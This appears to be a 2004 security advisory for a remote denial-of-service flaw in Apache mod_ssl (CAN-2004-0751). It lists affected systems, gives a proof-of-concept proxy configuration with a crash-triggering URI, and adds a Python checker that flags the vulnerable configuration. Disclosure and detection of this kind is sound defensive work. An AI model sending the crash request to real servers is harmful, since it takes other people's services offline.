

Title: Apache mod_ssl Remote Denial of Service Vulnerability
Published: 2004-09-10-12:00AM
Updated: 2005-01-13-05:33PM
Class: Failure to Handle Exceptional Conditions
CVE: CAN-2004-0751
Remote: Yes
Local: No
Credit: Discovery is credited to M. "Alex" Hankins <lxhankins002@fastmail.fm>.
Vulnerable:
Turbolinux Turbolinux Server 10.0
Turbolinux Turbolinux Desktop 10.0
Turbolinux Home
Trustix Secure Linux 2.1
Trustix Secure Linux 2.0
Trustix Secure Enterprise Linux 2.0
RedHat Enterprise Linux WS 3
RedHat Enterprise Linux ES 3
RedHat Enterprise Linux AS 3
RedHat Desktop 3.0
MandrakeSoft Linux Mandrake 10.0 amd64
MandrakeSoft Linux Mandrake 10.0
MandrakeSoft Linux Mandrake 9.2 amd64
MandrakeSoft Linux Mandrake 9.2
HP Tru64 UNIX Compaq Secure Web Server 6.3
HP Tru64 UNIX Compaq Secure Web Server 5.9.2
HP Tru64 UNIX Compaq Secure Web Server 5.9.1
HP Tru64 UNIX Compaq Secure Web Server 5.8.2
HP Tru64 UNIX Compaq Secure Web Server 5.8.1
HP Tru64 UNIX Compaq Secure Web Server 5.1 A
HP Tru64 UNIX Compaq Secure Web Server 5.1
HP Tru64 UNIX Compaq Secure Web Server 5.0 A
HP Tru64 UNIX Compaq Secure Web Server 4.0 G
HP Tru64 UNIX Compaq Secure Web Server 4.0 F
HP HPUX B.11.23
HP HPUX B.11.22
HP HPUX B.11.11
HP HPUX B.11.00
Gentoo Linux 1.4
Conectiva Linux 10.0
Conectiva Linux 9.0
Apache Software Foundation Apache 2.0.50
MandrakeSoft Linux Mandrake 10.1
MandrakeSoft Linux Mandrake 10.1 x86_64
Apache Software Foundation Apache 2.0.47
Apple Mac OS X Server 10.1
Apple Mac OS X Server 10.1.1
Apple Mac OS X Server 10.1.2
Apple Mac OS X Server 10.1.3
Apple Mac OS X Server 10.1.4
Apple Mac OS X Server 10.1.5
Apple Mac OS X Server 10.2
Apple Mac OS X Server 10.2.1
Apple Mac OS X Server 10.2.2
Apple Mac OS X Server 10.2.3
Apple Mac OS X Server 10.2.4
Apple Mac OS X Server 10.2.5
Apple Mac OS X Server 10.2.6
Apple Mac OS X Server 10.2.7
Apple Mac OS X Server 10.2.8
Apple Mac OS X Server 10.3
Apple Mac OS X Server 10.3.1
Apple Mac OS X Server 10.3.2
Apple Mac OS X Server 10.3.3
Apple Mac OS X Server 10.3.4
Apple Mac OS X Server 10.3.5
MandrakeSoft Linux Mandrake 9.1
MandrakeSoft Linux Mandrake 9.1 ppc
Not Vulnerable:
HP Tru64 UNIX Compaq Secure Web Server 6.3.2 a
Apache Software Foundation Apache 2.0.51
RedHat Fedora Core1
Code: No exploit is required.

The following proof of concept is available:

With the following configuration in httpd.conf:
Listen 47290
SSLProxyEngine on
RewriteEngine on
RewriteRule /(.*) https://www.example.com/$1 [P]

The server may be crashed by issuing the following URI:
http://www.example.com:47290/eRoomASP/CookieTest.asp?facility=facility&URL=%2FeRoom%2FFacility%2FRoom%2F0_4242
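
An added example (not part of the original advisory): a Python check that flags an httpd.conf combining SSLProxyEngine on with a RewriteRule that proxies ([P]) to an https:// target, the setup quoted above. The function names and the sample text are constructed for illustration, and container scoping such as <VirtualHost> is ignored.

```python
import re

# Constructed sample: the configuration quoted in the advisory, plus a comment line.
SAMPLE_CONF = """\
# reverse proxy front end
Listen 47290
SSLProxyEngine on
RewriteEngine on
RewriteRule /(.*) https://www.example.com/$1 [P]
"""

def directives(conf_text):
    """Yield (line_no, lowercased_name, args) for each directive line."""
    for no, raw in enumerate(conf_text.splitlines(), 1):
        line = raw.strip()
        # Skip blanks, comments and container tags such as <VirtualHost>.
        if not line or line.startswith("#") or line.startswith("<"):
            continue
        parts = line.split(None, 1)
        yield no, parts[0].lower(), parts[1] if len(parts) > 1 else ""

def proxies_to_https(args):
    """True if RewriteRule args have an https:// substitution and a P/proxy flag."""
    tokens = args.split()
    flags = re.search(r"\[([^\]]*)\]\s*$", args)
    if len(tokens) < 3 or not flags:
        return False
    names = {f.split("=")[0].strip().lower() for f in flags.group(1).split(",")}
    return tokens[1].lower().startswith("https://") and bool(names & {"p", "proxy"})

def find_exposure(conf_text):
    """Return line numbers of RewriteRules matching the advisory's setup, else []."""
    ssl_proxy_on = False
    hits = []
    for no, name, args in directives(conf_text):
        if name == "sslproxyengine" and args.strip().lower() == "on":
            ssl_proxy_on = True
        elif name == "rewriterule" and proxies_to_https(args):
            hits.append(no)
    # The directive order in the file does not matter, so decide at the end.
    return hits if ssl_proxy_on else []

if __name__ == "__main__":
    for line_no in find_exposure(SAMPLE_CONF):
        print(f"line {line_no}: RewriteRule proxies to https with SSLProxyEngine on")
```

A hit means the server matches the configuration in the proof of concept and should be running a release listed under Not Vulnerable (Apache 2.0.51 on this page).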

Copyright 2007, SecurityDot